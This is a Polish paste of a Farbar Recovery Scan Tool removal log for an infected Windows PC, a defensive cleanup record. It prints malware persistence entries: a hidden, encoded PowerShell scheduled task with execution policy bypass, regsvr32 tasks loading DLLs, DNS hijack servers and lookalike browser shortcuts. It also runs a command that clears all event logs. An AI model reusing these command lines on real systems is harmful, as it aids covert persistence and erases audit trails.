wklejto.pl

Dodane przez: ~Anonim (2018-04-03 20:27) -> text
1.
2.
3.
4.
5.
6.
7.
8.
9.
10.
11.
12.
13.
14.
15.
16.
17.
18.
19.
20.
21.
22.
23.
24.
25.
26.
27.
28.
29.
30.
31.
32.
33.
34.
35.
36.
37.
38.
39.
40.
41.
42.
43.
44.
45.
46.
47.
48.
49.
50.
51.
52.
53.
54.
55.
56.
57.
58.
59.
60.
61.
62.
63.
64.
65.
66.
67.
68.
69.
70.
71.
72.
73.
74.
75.
76.
77.
78.
79.
80.
81.
82.
83.
84.
85.
86.
87.
88.
89.
90.
91.
92.
93.
94.
95.
96.
97.
98.
99.
100.
101.
102.
103.
104.
105.
106.
107.
108.
109.
110.
111.
112.
113.
114.
115.
116.
117.
118.
119.
120.
121.
122.
123.
124.
125.
126.
127.
128.
129.
130.
131.
132.
133.
134.
135.
136.
137.
138.
139.
140.
141.
142.
143.
144.
145.
146.
147.
148.
149.
150.
151.
152.
153.
154.
155.
156.
157.
158.
159.
160.
161.
162.
163.
164.
165.
166.
167.
168.
169.
170.
171.
172.
173.
174.
175.
176.
177.
178.
179.
180.
181.
182.
183.
184.
185.
186.
187.
188.
189.
190.
191.
192.
193.
194.
195.
196.
197.
198.
199.
200.
201.
202.
203.
204.
205.
206.
207.
208.
209.
210.
211.
212.
213.
214.
215.
216.
217.
218.
219.
220.
221.
222.
Rezultat naprawy Farbar Recovery Scan Tool (x64) Wersja: 14.03.2018
Uruchomiony przez Kosia (03-04-2018 20:22:12) Run:2
Uruchomiony z C:\Users\Kosia\Desktop\logi
Załadowane profile: Kosia (Dostępne profile: Kosia)
Tryb startu: Normal
==============================================
 
fixlist - zawartość:
*****************
CloseProcesses:
CreateRestorePoint:
EmptyTemp:
VirusTotal: C:\ProgramData\AppmalopiK\IsFresh.dll
VirusTotal: C:\ProgramData\_tmp.exe
FilesInDirectory: C:\ProgramData\*.exe;*.dll;*.ini
Folder: C:\ProgramData\AppmalopiK
Folder: C:\ProgramData\e8dcd391
Folder: C:\Users\Kosia\AppData\Roaming\Browsers
AppInit_DLLs: C:\ProgramData\AppmalopiK\IsFresh.dll => C:\ProgramData\AppmalopiK\IsFresh.dll [342528 2018-03-01] ()
HKU\S-1-5-21-3276778656-193986366-2168794366-1000\...\MountPoints2: {4e13dc1c-ee1d-11e7-b3bd-08626627bd23} - F:\HiSuiteDownLoader.exe
HKU\S-1-5-21-3276778656-193986366-2168794366-1000\...\MountPoints2: {ce07d33f-31cd-11e8-897e-08626627bd23} - F:\HiSuiteDownLoader.exe
HKU\S-1-5-21-3276778656-193986366-2168794366-1000\...\MountPoints2: {fb0385d1-a384-11e7-b881-08626627bd23} - F:\AutoRun.exe
Tcpip\..\Interfaces\{CC1AB99C-FBDF-461F-A85B-B1FCBDCBEAE2}: [NameServer] 82.163.143.176 82.163.142.178
Tcpip\..\Interfaces\{CC1AB99C-FBDF-461F-A85B-B1FCBDCBEAE2}: [DhcpNameServer] 192.168.8.1 192.168.8.1
HKU\S-1-5-21-3276778656-193986366-2168794366-1000\Software\Microsoft\Internet Explorer\Main,Search Page = hxxps://%66%65%65%64.%68%65%6C%70%65%72%62%61%72.%63%6F%6D/?p=mKO_AwFzXIpYRaHdGKBHN80V5Qf4-sHAsJ8EcOZQdE_NO2Kwysz1IAuCqCcajpLyxAgZA5oNv4npuX7oHrQ_TeOJXnbhwFLL1dZ2btUGMfiMv0yJCrcUfjGqxShp5FHia4dAxNxv_XeDzYxu-xjbK0Zafs-jpuyGixLoLHAlQ_cFL_Q1BWu1mN7i3oZvhSqWg4E--YXmDw,,&q={searchTerms}
HKU\S-1-5-21-3276778656-193986366-2168794366-1000\Software\Microsoft\Internet Explorer\Main,Start Page = hxxps://%66%65%65%64.%68%65%6C%70%65%72%62%61%72.%63%6F%6D/?p=mKO_AwFzXIpYRaHdGKBHN80V5Qf4-sHAsJ8EcOZQdE_NO2Kwysz1IAuCqCcajpLyxAgZA5oNv4npuX7oHrQ_TeOJXnbhwFLL1dZ2btUGMfiMs_d8zwoMRdER6PPlmOsY7Wijov_P6SNQwgNxDTHNYL-r8mfTatKc1Gc7pvCF9W2OrMKZfzCk6bfeG-uQ_a4XQfnRFkPMtQ,,
SearchScopes: HKLM-x32 -> DefaultScope {ielnksrch} URL = 
SearchScopes: HKLM-x32 -> ielnksrch URL = hxxps://%66%65%65%64.%68%65%6C%70%65%72%62%61%72.%63%6F%6D/?p=mKO_AwFzXIpYRaHdGKBHN80V5Qf4-sHAsJ8EcOZQdE_NO2Kwysz1IAuCqCcajpLyxAgZA5oNv4npuX7oHrQ_TeOJXnbhwFLL1dZ2btUGMfiMv0yJCrcUfjGqxShp5FHia4dAxNxv_XeDzYxu-xjbK0Zafs-jpuyGixLoLHAlQ_cFL_Q1BWu1mN7i3oZvhSqWg4E--YXmDw,,&q={searchTerms}
SearchScopes: HKU\S-1-5-21-3276778656-193986366-2168794366-1000 -> DefaultScope {ielnksrch} URL = hxxps://%66%65%65%64.%68%65%6C%70%65%72%62%61%72.%63%6F%6D/?p=mKO_AwFzXIpYRaHdGKBHN80V5Qf4-sHAsJ8EcOZQdE_NO2Kwysz1IAuCqCcajpLyxAgZA5oNv4npuX7oHrQ_TeOJXnbhwFLL1dZ2btUGMfiMv0yJCrcUfjGqxShp5FHia4dAxNxv_XeDzYxu-xjbK0Zafs-jpuyGixLoLHAlQ_cFL_Q1BWu1mN7i3oZvhSqWg4E--YXmDw,,&q={searchTerms}
SearchScopes: HKU\S-1-5-21-3276778656-193986366-2168794366-1000 -> {ielnksrch} URL = hxxps://%66%65%65%64.%68%65%6C%70%65%72%62%61%72.%63%6F%6D/?p=mKO_AwFzXIpYRaHdGKBHN80V5Qf4-sHAsJ8EcOZQdE_NO2Kwysz1IAuCqCcajpLyxAgZA5oNv4npuX7oHrQ_TeOJXnbhwFLL1dZ2btUGMfiMv0yJCrcUfjGqxShp5FHia4dAxNxv_XeDzYxu-xjbK0Zafs-jpuyGixLoLHAlQ_cFL_Q1BWu1mN7i3oZvhSqWg4E--YXmDw,,&q={searchTerms}
CHR HomePage: Default -> hxxps://%66%65%65%64.%68%65%6C%70%65%72%62%61%72.%63%6F%6D/?p=mKO_AwFzXIpYRaHdGKBHN80V5Qf4-sHAsJ8EcOZQdE_NO2Kwysz1IAuCqCcajpLyxAgZA5oNv4npuX7oHrQ_TeOJXnbhwFLL1dZ2btUGMfiMv1fVREfv9cOY2p0SAQ66lQZswWMxmmaw6TQHeVN7s3Yd7NTBxLbPzblsFTIBgXxE_l9FffNVex_o45JQ4k12FCfseBiy7A,,
CHR StartupUrls: Default -> "hxxp://www.oursurfing.com/?type=hp&ts=1440178206&z=6482fc48417735a576630ddgdz0z6efgcmabcobgbe&from=amt&uid=SAMSUNGXHD322HJ_S17AJ9AS808760"
S3 MSICDSetup; \??\E:\CDriver64.sys [X]
Task: {5570E4C3-EEC3-4E10-B263-E27482CB2112} - System32\Tasks\{0E090E47-0C78-0E7E-7E11-7F087A0F110B} => C:\Windows\system32\WindowsPowershell\v1.0\powershell.exe -nologo -executionpolicy bypass -noninteractive -windowstyle hidden -EncodedCommand IAAgADsAIAA7ADsAIAA7ADsAIAA7ADsAOwAgADsAOwA7ADsAJABFAHIAcgBvAHIAQQBjAHQAaQBvAG4AUAByAGUAZgBlAHIAZQBuAGMAZQA9ACIAcwB0AG8AcAAiADsAJABzAGMAPQAiAFMAaQBsAGUAbgB0AGwAeQBDAG8AbgB0AGkAbgB1AGUAIgA7ACQAVwBhAHIAbgBpAG4AZwBQAHIA (dane wartości zawierają 9624 znaków więcej). <==== UWAGA
Task: {679EC469-C9BA-4110-AE3A-51F47551B9CD} - System32\Tasks\{252D0B2B-C4F3-7738-2B4A-D863EF2F9408} => C:\Windows\system32\regsvr32.exe /s /n /i:"/rt" "C:\PROGRA~3\e8dcd391\ea67273e.dll" <==== UWAGA
Task: {CDB041CD-82CA-4C10-9E11-57D416416F20} - System32\Tasks\C6B64180-7D71-4482-809E-5405F985279B => C:\Windows\SysWOW64\regsvr32.exe /n /s /i:"/279148f19a5f55f5 /q" "C:\Users\Kosia\AppData\Local\36283D~1\{EA672~1."
 
AlternateDataStreams: C:\Users\Public\AppData:CSM [484]
C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Gооglе Сhrоme.lnk
C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Media Center.lnk
C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Ерiс Gаmes Lаunchеr.lnk
C:\ProgramData\Microsoft\Windows\Start Menu\Programs\reFX\Nexus\NEXUS Manual English.lnk
C:\ProgramData\Microsoft\Windows\Start Menu\Programs\reFX\Nexus\What's New.lnk
C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Google Chrome\Odinstaluj Google Chrome.lnk
C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Battle.net\Ваttle.nеt.lnk
C:\Users\Kosia\Desktop\Ерiс Gаmes Launcher.lnk
C:\Users\Kosia\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Accessories\System Tools\Intеrnet Ехplоrеr (Nо Add-оns).lnk
C:\Users\Kosia\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\Gоogle Сhromе.lnk
C:\Users\Kosia\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\Lаunсh Internet Еxрlоrеr Вrowser.lnk
C:\Users\Kosia\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned\TaskBar\Gоogle Сhrоme.lnk
C:\Users\Kosia\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned\ImplicitAppShortcuts\5fdb9ea4fac2959b\Google Chrome.lnk
C:\Users\Kosia\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Intеrnet Ехplоrer.lnk
C:\Users\Kosia\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Intеrnet Ехрlorеr (64-bit).lnk
C:\Users\Public\Desktop\Gооgle Сhrоme.lnk
C:\Users\Public\Desktop\Вattle.net.lnk
C:\Users\Public\Desktop\Еpic Gаmes Lаuncher.lnk
CMD: ipconfig /flushdns
Powershell: wevtutil el | Foreach-Object {wevtutil cl "$_"}
 
*****************
 
Procesy zostały pomyślnie zamknięte.
Punkt przywracania został pomyślnie utworzony.
VirusTotal: C:\ProgramData\AppmalopiK\IsFresh.dll => https://www.virustotal.com/file/243c2309ad2255c32a8d57dc286a74a6c0c14c6bb74617ef153720b224f0f416/analysis/1522775404/
VirusTotal: C:\ProgramData\_tmp.exe => https://www.virustotal.com/file/9c57d4c45f10688a2c754ff1ed3bf9de95892782285aef26f1322d923e15dcf1/analysis/1521803569/
 
========================= FilesInDirectory: C:\ProgramData\*.exe;*.dll;*.ini ========================
 
2018-03-01 17:40 - 2018-03-01 17:40 - 000266330 ____A [1770D359D9B45F8E08C0120F1607CBB1] () C:\ProgramData\_tmp.exe
 
====== Koniec  Filesindirectory ======
 
========================= Folder: C:\ProgramData\AppmalopiK ========================
 
2018-03-01 17:39 - 2018-03-01 17:36 - 007585792 ____A [708A9D6C7139815BAF98642501782EA0] () C:\ProgramData\AppmalopiK\AppmalopiK.d.dat
2018-03-01 17:39 - 2018-03-01 17:36 - 000018432 ____A [C37CDBBBD210775AAA9AF261EF0843C4] () C:\ProgramData\AppmalopiK\AppmalopiK.dat
2018-03-01 17:39 - 2018-03-01 17:40 - 000000829 ____A [45F6A912EFC7C676B5E5BC386B36B4B8] () C:\ProgramData\AppmalopiK\conf.config
2018-03-01 17:39 - 2018-03-01 17:39 - 000024576 ____A [6C0B81E2B9D5ED38D1C7EEE3BC91DC50] () C:\ProgramData\AppmalopiK\Dinglux.dat
2018-03-01 17:39 - 2018-03-01 17:39 - 000880640 ____A [572DDE28515CA6B9B0804CEC9D6221AB] () C:\ProgramData\AppmalopiK\Funstattouch.bin
2018-03-01 17:39 - 2018-03-01 17:39 - 000473088 ____A [A2BB134317F85202E8FE33AF11B44AB1] () C:\ProgramData\AppmalopiK\Groovelight.bin
2018-03-01 17:39 - 2018-03-01 17:39 - 000000000 ____A [D41D8CD98F00B204E9800998ECF8427E] () C:\ProgramData\AppmalopiK\Hotflex.bin
2018-03-01 17:39 - 2018-03-01 17:39 - 000342528 ____A [999259B797B41F66383BAEF4C0B9B8A3] () C:\ProgramData\AppmalopiK\IsFresh.dll
2018-03-01 22:40 - 2018-03-01 22:40 - 000086208 ____A [A4D6A5343A82D6F658A5C9BE1935D7A9] () C:\ProgramData\AppmalopiK\j2jt1wh3.xml
2018-03-01 17:39 - 2016-07-06 11:21 - 000005568 ____A [B740BA3DEBD61187D6B2EF17D21991DB] () C:\ProgramData\AppmalopiK\md.xml
2018-03-01 17:39 - 2018-03-01 17:39 - 000149504 ____A [8D2AB1ECD060EABC476E6C742AA27018] () C:\ProgramData\AppmalopiK\Ranstock.exe
2018-03-01 17:39 - 2018-03-01 17:39 - 000000266 ____A [D0862E4FA687DFC92A3551F33977AF93] () C:\ProgramData\AppmalopiK\Ranstock.exe.config
2018-03-01 17:39 - 2018-03-01 17:39 - 000000000 ____A [D41D8CD98F00B204E9800998ECF8427E] () C:\ProgramData\AppmalopiK\S-soloex.bin
2018-03-01 17:40 - 2018-03-01 17:40 - 000014336 ____A [76535EDEC0BA0EDD21A741A0688140FC] () C:\ProgramData\AppmalopiK\Stathold.dat
2018-03-01 17:39 - 2018-03-01 17:39 - 000620032 ____A [E93EAA13BCA259D97579BB7C897267C3] () C:\ProgramData\AppmalopiK\Tamtam.bin
2018-03-01 17:39 - 2018-03-01 17:39 - 000114688 ____A [0D508A37EB3484293EEDD54A8696AA24] () C:\ProgramData\AppmalopiK\Triseco.exe
2018-03-01 17:39 - 2018-03-01 17:39 - 000000266 ____A [D0862E4FA687DFC92A3551F33977AF93] () C:\ProgramData\AppmalopiK\Triseco.exe.config
2018-03-01 17:39 - 2018-03-01 17:36 - 000126464 ____A [EA12A8EBFBE549DFE955881DE72D1712] () C:\ProgramData\AppmalopiK\uninstall.dat
2018-03-01 17:39 - 2018-03-01 17:39 - 000000000 ____A [D41D8CD98F00B204E9800998ECF8427E] () C:\ProgramData\AppmalopiK\Vaiastock.dat
2018-03-01 17:39 - 2018-03-01 17:39 - 000510976 ____A [9B9C5E80153F3E7D5AA9906183CCA44F] () C:\ProgramData\AppmalopiK\VentoTamit.bin
2018-03-01 17:39 - 2018-03-01 17:39 - 000000000 ____A [D41D8CD98F00B204E9800998ECF8427E] () C:\ProgramData\AppmalopiK\Villatough.bin
2018-03-01 17:39 - 2018-03-01 17:39 - 000252928 ____A [09EAB69315E00B74DFA2CA27A5542829] () C:\ProgramData\AppmalopiK\VillaTough.dat
2018-03-01 17:40 - 2018-03-01 17:40 - 000000000 ____D [00000000000000000000000000000000] () C:\ProgramData\AppmalopiK\ondemand
2018-03-01 17:40 - 2018-03-01 17:40 - 000014336 ____A [76535EDEC0BA0EDD21A741A0688140FC] () C:\ProgramData\AppmalopiK\ondemand\Stathold.dat
 
====== Koniec  Folder: ======
 
 
========================= Folder: C:\ProgramData\e8dcd391 ========================
 
2018-03-05 23:38 - 2018-03-05 23:40 - 001008640 ____A [2B60C71BB296BB90914EE79E82205AEE] () C:\ProgramData\e8dcd391\ea67273e.dll
 
====== Koniec  Folder: ======
 
 
========================= Folder: C:\Users\Kosia\AppData\Roaming\Browsers ========================
 
2018-03-01 17:08 - 2017-12-29 23:48 - 000219624 ____A [29CB42283C4036B4189C0E9530B48EC8] (Blizzard Entertainment) C:\Users\Kosia\AppData\Roaming\Browsers\battle.net launcher.bat.exe
2018-03-01 17:08 - 2018-02-22 05:57 - 001581912 ____A [410E6A1DF0EA9EDEA2E01B1030D300AE] (Google Inc.) C:\Users\Kosia\AppData\Roaming\Browsers\chrome.bat.exe
2018-03-01 17:08 - 2018-02-15 23:35 - 003049408 ____A [6DA70ABC8E163291AC4ADB2E9F7038FC] (Epic Games, Inc.) C:\Users\Kosia\AppData\Roaming\Browsers\epicgameslauncher.bat.exe
2018-03-01 17:08 - 2018-03-01 17:08 - 000000581 _RASH [6088967145532C1F8B16018FFF1EA28E] () C:\Users\Kosia\AppData\Roaming\Browsers\exe.emorhc.bat
2018-03-01 17:08 - 2018-03-01 17:08 - 000000497 _RASH [FDF17A8AEC50ED8BB028D500723548FC] () C:\Users\Kosia\AppData\Roaming\Browsers\exe.erolpxei.bat
2018-03-01 17:08 - 2018-03-01 17:08 - 000000448 _RASH [387CBE1FF2D8C6C69B844D046A3FB0EC] () C:\Users\Kosia\AppData\Roaming\Browsers\exe.rehcnual ten.elttab.bat
2018-03-01 17:08 - 2018-03-01 17:08 - 000000651 _RASH [BE60BA8B47BC5BC43B3FA67A9A882AAD] () C:\Users\Kosia\AppData\Roaming\Browsers\exe.rehcnualsemagcipe.bat
2018-03-01 17:08 - 2010-11-21 05:25 - 000673040 ____A [C613E69C3B191BB02C7A191741A1D024] (Microsoft Corporation) C:\Users\Kosia\AppData\Roaming\Browsers\iexplore.bat.exe
 
====== Koniec  Folder: ======
 
"C:\ProgramData\AppmalopiK\IsFresh.dll" => Dane wartości pomyślnie usunięto
"HKU\S-1-5-21-3276778656-193986366-2168794366-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{4e13dc1c-ee1d-11e7-b3bd-08626627bd23}" => pomyślnie usunięto
HKLM\Software\Classes\CLSID\{4e13dc1c-ee1d-11e7-b3bd-08626627bd23} => nie znaleziono
"HKU\S-1-5-21-3276778656-193986366-2168794366-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{ce07d33f-31cd-11e8-897e-08626627bd23}" => pomyślnie usunięto
HKLM\Software\Classes\CLSID\{ce07d33f-31cd-11e8-897e-08626627bd23} => nie znaleziono
"HKU\S-1-5-21-3276778656-193986366-2168794366-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{fb0385d1-a384-11e7-b881-08626627bd23}" => pomyślnie usunięto
HKLM\Software\Classes\CLSID\{fb0385d1-a384-11e7-b881-08626627bd23} => nie znaleziono
"HKLM\System\CurrentControlSet\Services\Tcpip\Parameters\Interfaces\{CC1AB99C-FBDF-461F-A85B-B1FCBDCBEAE2}\\NameServer" => pomyślnie usunięto
"HKLM\System\CurrentControlSet\Services\Tcpip\Parameters\Interfaces\{CC1AB99C-FBDF-461F-A85B-B1FCBDCBEAE2}\\DhcpNameServer" => pomyślnie usunięto
HKU\S-1-5-21-3276778656-193986366-2168794366-1000\Software\Microsoft\Internet Explorer\Main\\Search Page => Wartość pomyślnie przywrócono
HKU\S-1-5-21-3276778656-193986366-2168794366-1000\Software\Microsoft\Internet Explorer\Main\\Start Page => Wartość pomyślnie przywrócono
HKLM\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\SearchScopes\\DefaultScope => Wartość pomyślnie przywrócono
"HKLM\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\SearchScopes\ielnksrch" => pomyślnie usunięto
HKLM\Software\Wow6432Node\Classes\CLSID\ielnksrch => nie znaleziono
"HKU\S-1-5-21-3276778656-193986366-2168794366-1000\SOFTWARE\Microsoft\Internet Explorer\SearchScopes\\DefaultScope" => pomyślnie usunięto
"HKU\S-1-5-21-3276778656-193986366-2168794366-1000\SOFTWARE\Microsoft\Internet Explorer\SearchScopes\{ielnksrch}" => pomyślnie usunięto
HKLM\Software\Classes\CLSID\{ielnksrch} => nie znaleziono
"Chrome HomePage" => pomyślnie usunięto
"Chrome StartupUrls" => pomyślnie usunięto
"HKLM\System\CurrentControlSet\Services\MSICDSetup" => pomyślnie usunięto
MSICDSetup => serwis pomyślnie usunięto
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Plain\{5570E4C3-EEC3-4E10-B263-E27482CB2112}" => pomyślnie usunięto
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{5570E4C3-EEC3-4E10-B263-E27482CB2112}" => pomyślnie usunięto
C:\Windows\System32\Tasks\{0E090E47-0C78-0E7E-7E11-7F087A0F110B} => pomyślnie przeniesiono
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\{0E090E47-0C78-0E7E-7E11-7F087A0F110B}" => pomyślnie usunięto
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Plain\{679EC469-C9BA-4110-AE3A-51F47551B9CD}" => pomyślnie usunięto
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{679EC469-C9BA-4110-AE3A-51F47551B9CD}" => pomyślnie usunięto
C:\Windows\System32\Tasks\{252D0B2B-C4F3-7738-2B4A-D863EF2F9408} => pomyślnie przeniesiono
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\{252D0B2B-C4F3-7738-2B4A-D863EF2F9408}" => pomyślnie usunięto
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Logon\{CDB041CD-82CA-4C10-9E11-57D416416F20}" => pomyślnie usunięto
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{CDB041CD-82CA-4C10-9E11-57D416416F20}" => pomyślnie usunięto
C:\Windows\System32\Tasks\C6B64180-7D71-4482-809E-5405F985279B => pomyślnie przeniesiono
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\C6B64180-7D71-4482-809E-5405F985279B" => pomyślnie usunięto
"C:\Users\Public\AppData" => ":CSM" ADS nie znaleziono.
C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Gооglе Сhrоme.lnk => pomyślnie przeniesiono
C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Media Center.lnk => pomyślnie przeniesiono
C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Ерiс Gаmes Lаunchеr.lnk => pomyślnie przeniesiono
C:\ProgramData\Microsoft\Windows\Start Menu\Programs\reFX\Nexus\NEXUS Manual English.lnk => pomyślnie przeniesiono
C:\ProgramData\Microsoft\Windows\Start Menu\Programs\reFX\Nexus\What's New.lnk => pomyślnie przeniesiono
C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Google Chrome\Odinstaluj Google Chrome.lnk => pomyślnie przeniesiono
C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Battle.net\Ваttle.nеt.lnk => pomyślnie przeniesiono
C:\Users\Kosia\Desktop\Ерiс Gаmes Launcher.lnk => pomyślnie przeniesiono
C:\Users\Kosia\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Accessories\System Tools\Intеrnet Ехplоrеr (Nо Add-оns).lnk => pomyślnie przeniesiono
C:\Users\Kosia\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\Gоogle Сhromе.lnk => pomyślnie przeniesiono
C:\Users\Kosia\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\Lаunсh Internet Еxрlоrеr Вrowser.lnk => pomyślnie przeniesiono
C:\Users\Kosia\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned\TaskBar\Gоogle Сhrоme.lnk => pomyślnie przeniesiono
C:\Users\Kosia\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned\ImplicitAppShortcuts\5fdb9ea4fac2959b\Google Chrome.lnk => pomyślnie przeniesiono
C:\Users\Kosia\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Intеrnet Ехplоrer.lnk => pomyślnie przeniesiono
C:\Users\Kosia\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Intеrnet Ехрlorеr (64-bit).lnk => pomyślnie przeniesiono
C:\Users\Public\Desktop\Gооgle Сhrоme.lnk => pomyślnie przeniesiono
C:\Users\Public\Desktop\Вattle.net.lnk => pomyślnie przeniesiono
C:\Users\Public\Desktop\Еpic Gаmes Lаuncher.lnk => pomyślnie przeniesiono
 
========= ipconfig /flushdns =========
 
 
Konfiguracja IP systemu Windows
 
Pomy˜lnie opr˘ľniono pami©† podr©cznĄ programu rozpoznawania nazw DNS.
 
========= Koniec  CMD: =========
 
 
========= wevtutil el | Foreach-Object {wevtutil cl "$_"} =========
 
 
========= Koniec  Powershell: =========
 
 
=========== EmptyTemp: ==========
 
BITS transfer queue => 8388608 B
DOMStore, IE Recovery, AppCache, Feeds Cache, Thumbcache, IconCache => 6124666 B
Java, Flash, Steam htmlcache => 0 B
Windows/system/drivers => 0 B
Edge => 0 B
Chrome => 76569752 B
Firefox => 0 B
Opera => 0 B
 
Temp, IE cache, history, cookies, recent:
Users => 0 B
Default => 0 B
Public => 0 B
ProgramData => 0 B
systemprofile => 66228 B
systemprofile32 => 0 B
LocalService => 66228 B
NetworkService => 0 B
Kosia => 2445789 B
 
RecycleBin => 2647073 B
EmptyTemp: => 91.8 MB danych tymczasowych Usunięto.
 
================================
 
 
System wymagał restartu.
 
==== Koniec  Fixlog 20:23:05 ====
Wygenerowano w 0.026s, przy pomocy GeSHi 1.0.8
'
Podziel się na Facebook Podziel się na BLIP Podziel się na Twitter Podziel się na Buzz Podziel się na Flaker Dodaj zakładkę Google Podziel się na Delicious Wykop to!

Nowy Komentarz:

Komentarze:

Brak Komentarzy!